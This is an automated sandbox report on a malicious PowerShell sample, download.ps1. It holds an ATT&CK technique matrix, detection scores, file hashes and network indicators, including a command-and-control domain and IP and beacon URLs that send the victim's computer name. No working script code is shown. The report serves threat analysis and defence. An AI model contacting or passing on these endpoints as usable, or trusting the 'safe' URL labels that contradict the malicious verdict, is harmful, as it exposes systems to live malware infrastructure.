Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Windows Management Instrumentation
1
DLL Side-Loading
1
Process Injection
121
Virtualization/Sandbox Evasion
OS Credential Dumping21
Security Software Discovery
Remote Services1
Archive Collected Data
1
Encrypted Channel
Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault Accounts1
PowerShell
Boot or Logon Initialization Scripts1
DLL Side-Loading
1
Process Injection
LSASS Memory1
Process Discovery
Remote Desktop ProtocolData from Removable Media1
Ingress Tool Transfer
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager121
Virtualization/Sandbox Evasion
SMB/Windows Admin SharesData from Network Shared Drive2
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
DLL Side-Loading
NTDS1
Application Window Discovery
Distributed Component Object ModelInput Capture12
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
File and Directory Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials11
System Information Discovery
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
download.ps115%VirustotalBrowse
download.ps13%ReversingLabs
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://kmaealcfcalhcac.top0%Avira URL Cloudsafe
http://kmaealcfcalhcac.top/92fzsvy3ouhtr.php?id=user-PC&key=91940559182&s=5270%Avira URL Cloudsafe
http://$9bsu5ro72hgpqxk/$x4dbnkmt7rp9vl2.php?id=$env:computername&key=$dekctvjq&s=5270%Avira URL Cloudsafe
http://crl.microsofta0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
kmaealcfcalhcac.top
45.61.136.138
truetrue
    unknown
    www.google.com
    172.217.16.196
    truefalse
      high
      NameMaliciousAntivirus DetectionReputation
      http://kmaealcfcalhcac.top/92fzsvy3ouhtr.php?id=user-PC&key=91940559182&s=527true
      • Avira URL Cloud: safe
      unknown
      http://www.google.com/false
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://photos.google.com/?tab=wq&pageId=nonepowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
          high
          http://www.google.com/preferences?hl=enXpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
            high
            https://csp.withgoogle.com/csp/gws/other-hppowershell.exe, 00000000.00000002.1400706287.0000022C23657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C236E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D15000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmpfalse
              high
              http://www.microsoft.copowershell.exe, 00000000.00000002.1413763000.0000022C2B92C000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://contoso.com/Licensepowershell.exe, 00000000.00000002.1400706287.0000022C234EE000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  https://news.google.com/?tab=wnpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                    high
                    https://docs.google.com/document/?usp=docs_alcpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                      high
                      http://schema.org/WebPagepowershell.exe, 00000000.00000002.1373706201.0000022C14D86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C15C03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C158FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C1590A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C15C1B000.00000004.00000800.00020000.00000000.sdmpfalse
                        high
                        https://0.google.com/powershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          https://www.google.com/webhp?tab=wwpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D86000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://kmaealcfcalhcac.toppowershell.exe, 00000000.00000002.1373706201.0000022C14D0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C1498F000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://$9bsu5ro72hgpqxk/$x4dbnkmt7rp9vl2.php?id=$env:computername&key=$dekctvjq&s=527powershell.exe, 00000000.00000002.1373706201.0000022C136A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C1498F000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            http://schema.org/WebPageXpowershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://contoso.com/powershell.exe, 00000000.00000002.1400706287.0000022C234EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://nuget.org/nuget.exepowershell.exe, 00000000.00000002.1400706287.0000022C234EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://www.google.com/finance?tab=wepowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://maps.google.com/maps?hl=en&tab=wlpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.google.compowershell.exe, 00000000.00000002.1373706201.0000022C14D2B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D15000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        https://apis.google.compowershell.exe, 00000000.00000002.1400706287.0000022C23777000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C23481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C23657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C236E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D86000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14F22000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000000.00000002.1373706201.0000022C13481000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            http://www.blogger.com/?tab=wjpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://www.google.com/mobile/?hl=en&tab=wDpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://play.google.com/?hl=en&tab=w8powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://nuget.org/NuGet.exepowershell.exe, 00000000.00000002.1400706287.0000022C234EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://www.google.com/imghp?hl=en&tab=wipowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://www.google.com/shopping?hl=en&source=og&tab=wfpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://lh3.googleusercontent.com/ogw/default-user=s96powershell.exe, 00000000.00000002.1400706287.0000022C23777000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C23481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C23657000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D4C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1400706287.0000022C236E9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D86000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000000.00000002.1373706201.0000022C136A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000000.00000002.1373706201.0000022C136A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000000.00000002.1373706201.0000022C136A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                https://drive.google.com/?tab=wopowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  https://contoso.com/Iconpowershell.exe, 00000000.00000002.1400706287.0000022C234EE000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    https://0.googlepowershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      https://mail.google.com/mail/?tab=wmpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1373706201.0000022C136A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://0.google.powershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://0.google.com/powershell.exe, 00000000.00000002.1373706201.0000022C14DF6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.1373706201.0000022C14F22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1373706201.0000022C14D37000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1373706201.0000022C136A8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              http://crl.microsoftapowershell.exe, 00000000.00000002.1411904683.0000022C2B6B0000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.1373706201.0000022C15452000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://aka.ms/pscore68powershell.exe, 00000000.00000002.1373706201.0000022C13481000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.1373706201.0000022C14F22000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    45.61.136.138
                                                                                                    kmaealcfcalhcac.topUnited States
                                                                                                    40676AS40676UStrue
                                                                                                    172.217.16.196
                                                                                                    www.google.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    Joe Sandbox version:42.0.0 Malachite
                                                                                                    Analysis ID:1589104
                                                                                                    Start date and time:2025-01-11 09:38:34 +01:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 4m 24s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:14
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:0
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:download.ps1
                                                                                                    Detection:MAL
                                                                                                    Classification:mal76.evad.winPS1@2/7@2/2
                                                                                                    EGA Information:Failed
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 100%
                                                                                                    • Number of executed functions: 14
                                                                                                    • Number of non-executed functions: 1
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .ps1
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe
                                                                                                    • Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.245.163.56
                                                                                                    • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 6632 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report size getting too big, too many NtCreateKey calls found.
                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    TimeTypeDescription
                                                                                                    03:39:29API Interceptor45x Sleep call for process: powershell.exe modified
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    45.61.136.138http://diebinjmajbkhhg.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                    • diebinjmajbkhhg.top/1.php?s=527
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • jejmbadfmeenlnk.top/exikvouhlzhtr.php?id=computer&key=73195386263&s=527
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • jejmbadfmeenlnk.top/7zp8hc951fhtr.php?id=user-PC&key=47155048466&s=527
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • jejmbadfmeenlnk.top/jkhy8nim3ohtr.php?id=computer&key=23808639779&s=527
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • jejmbadfmeenlnk.top/rye5ap6jovhtr.php?id=user-PC&key=76750660876&s=527
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • canjjclmlnicbga.top/qp49hfdl12htr.php?id=computer&key=36785799113&s=527
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • canjjclmlnicbga.top/ujbqd70lwehtr.php?id=user-PC&key=103617095359&s=527
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • jjdgdeffjimfgne.top/0ouyalt7pvhtr.php?id=computer&key=66159843360&s=527
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • jjdgdeffjimfgne.top/hibqcrnlaehtr.php?id=user-PC&key=124983136495&s=527
                                                                                                    No context
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    AS40676UShttp://diebinjmajbkhhg.top/1.php?s=527Get hashmaliciousUnknownBrowse
                                                                                                    • 45.61.136.138
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • 45.61.136.138
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • 45.61.136.138
                                                                                                    install.msiGet hashmaliciousUnknownBrowse
                                                                                                    • 193.32.177.34
                                                                                                    install.msiGet hashmaliciousUnknownBrowse
                                                                                                    • 193.32.177.34
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • 45.61.136.138
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • 45.61.136.138
                                                                                                    5.elfGet hashmaliciousUnknownBrowse
                                                                                                    • 104.149.140.73
                                                                                                    download.ps1Get hashmaliciousUnknownBrowse
                                                                                                    • 45.61.136.138
                                                                                                    No context
                                                                                                    No context
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:NlllulltP/XZ:NllU
                                                                                                    MD5:F4FD6F7F8DDC8D2716B5AE289B93BDCE
                                                                                                    SHA1:F48B3E013E3536DB71FED89B5786847E3951C767
                                                                                                    SHA-256:84EDE900B5623435AF6CC6C8266F751A2BF95CBF19E9B12C63178A389A3472C0
                                                                                                    SHA-512:B7C830C41152C07E30DDA334F0B0F2CEF9632074FE87958680B490CC6A650145536D33178E2E744AAC2303014A4C243C3DAA5E44261291DC853C977911FFBB09
                                                                                                    Malicious:false
                                                                                                    Reputation:low
                                                                                                    Preview:@...e.................................4.*............@..........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Reputation:high, very likely benign file
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                    Malicious:false
                                                                                                    Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6225
                                                                                                    Entropy (8bit):3.744320369422591
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ODr248JQgCoU20oEukvhkvklCywEjBsMl6+SogZo0JSJaDBsMl0+SogZo0JSJO1:74CQgChrKkvhkvCCtCBsMSH5BsM8HL
                                                                                                    MD5:8362E0AD696637A8D1261D24EDCA2A33
                                                                                                    SHA1:F1DBE81253B7F6D288568873E08D14C391746632
                                                                                                    SHA-256:94E8B96B02C6D1668766FBF8DC3ED8F8DFC02CA28A01F9E321B008D3929874D6
                                                                                                    SHA-512:2AD2A482D6DDD5B240984EA9A9DCD93184B38E28E52325ED75E5405BC10A0681124C2DF486E49B4B8689524474C51C1C688D6B19AECFF10F59B9D71D3C93AD5B
                                                                                                    Malicious:false
                                                                                                    Preview:...................................FL..................F.".. .....*_...`.$R.d..z.:{.............................:..DG..Yr?.D..U..k0.&...&......Qg.*_...b.UN.d...h:R.d......t...CFSF..1.....EW.=..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......EW.=+Z.D..........................3*N.A.p.p.D.a.t.a...B.V.1.....+Z.D..Roaming.@......EW.=+Z.D...........................sM.R.o.a.m.i.n.g.....\.1.....EW|>..MICROS~1..D......EW.=+Z.D..............................M.i.c.r.o.s.o.f.t.....V.1.....EW.>..Windows.@......EW.=+Z.D..........................vC!.W.i.n.d.o.w.s.......1.....EW.=..STARTM~1..n......EW.=+Z.D....................D.....ZN..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....EW{>..Programs..j......EW.=+Z.D....................@.....;.".P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......EW.=EW.=..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......EW.=+Z.D....9...........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):6225
                                                                                                    Entropy (8bit):3.744320369422591
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:ODr248JQgCoU20oEukvhkvklCywEjBsMl6+SogZo0JSJaDBsMl0+SogZo0JSJO1:74CQgChrKkvhkvCCtCBsMSH5BsM8HL
                                                                                                    MD5:8362E0AD696637A8D1261D24EDCA2A33
                                                                                                    SHA1:F1DBE81253B7F6D288568873E08D14C391746632
                                                                                                    SHA-256:94E8B96B02C6D1668766FBF8DC3ED8F8DFC02CA28A01F9E321B008D3929874D6
                                                                                                    SHA-512:2AD2A482D6DDD5B240984EA9A9DCD93184B38E28E52325ED75E5405BC10A0681124C2DF486E49B4B8689524474C51C1C688D6B19AECFF10F59B9D71D3C93AD5B
                                                                                                    Malicious:false
